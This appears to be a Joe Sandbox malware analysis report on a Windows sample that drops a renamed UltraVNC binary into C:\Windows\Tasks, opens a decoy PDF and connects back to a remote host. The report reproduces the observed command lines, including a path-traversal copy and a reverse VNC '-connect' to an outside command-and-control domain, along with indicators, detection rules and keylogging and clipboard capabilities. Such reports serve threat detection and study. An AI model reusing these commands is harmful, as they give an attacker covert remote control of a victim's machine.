Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7q551ugrWe.exe

Overview

General Information

Sample name:7q551ugrWe.exe
renamed because original name is a hash value
Original sample name:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
Analysis ID:1579876
MD5:d61940626fad051067bfd16f2ab4e657
SHA1:cceaeda73fca724016bac0c9cb000fcd4ca1e523
SHA256:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • 7q551ugrWe.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\7q551ugrWe.exe" MD5: D61940626FAD051067BFD16F2AB4E657)
    • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7132 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6728 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 5520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7124 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3852 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 1496 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 6632 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 5432 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7440 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7556 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 7736 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7772 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 6084 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7368 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4676 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6160 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\sync_browser.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Windows\Tasks\WPSela.LSZr7VJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 9 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  23.2.sync_browser.exe.7ff6dc0c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    18.0.sync_browser.exe.7ff6dc0c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      18.2.sync_browser.exe.7ff6dc0c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        23.0.sync_browser.exe.7ff6dc0c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7736, ProcessName: sync_browser.exe
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7132, TargetFilename: C:\Windows\Tasks\conhost.exe
                          Sigma detected: Suspicious UltraVNC Execution
                          Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, ProcessId: 6084, ProcessName: sync_browser.exe
                          Sigma detected: Potential Command Line Path Traversal Evasion Attempt
                          Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 6984, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 6496, ProcessName: cmd.exe
                          Sigma detected: Suspicious Copy From or To System Directory
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 6984, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 6496, ProcessName: cmd.exe
                          Sigma detected: Suspicious Process Start Locations
                          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7736, ProcessName: sync_browser.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-23T13:31:29.416752+010020358931Malware Command and Control Activity Detected192.168.2.549995194.190.152.201443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Multi AV Scanner detection for submitted file
                          Source: 7q551ugrWe.exeReversingLabs: Detection: 23%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
                          Source: 7q551ugrWe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,18_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,18_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,18_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: Joe Sandbox ViewASN Name: RSHB-ASRU RSHB-ASRU
                          Source: Network trafficSuricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.5:49995 -> 194.190.152.201:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CC810 recv,recv,recv,recv,18_2_00007FF6DC0CC810
                          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                          Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://forum.uvnc.com
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://www.uvnc.com
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                          Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to register a low level keyboard hook
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,18_2_00007FF6DC0C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,18_2_00007FF6DC0C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_00007FF6DC0F13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF6DC0C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF6DC0F13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C1AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,18_2_00007FF6DC0C1AE0
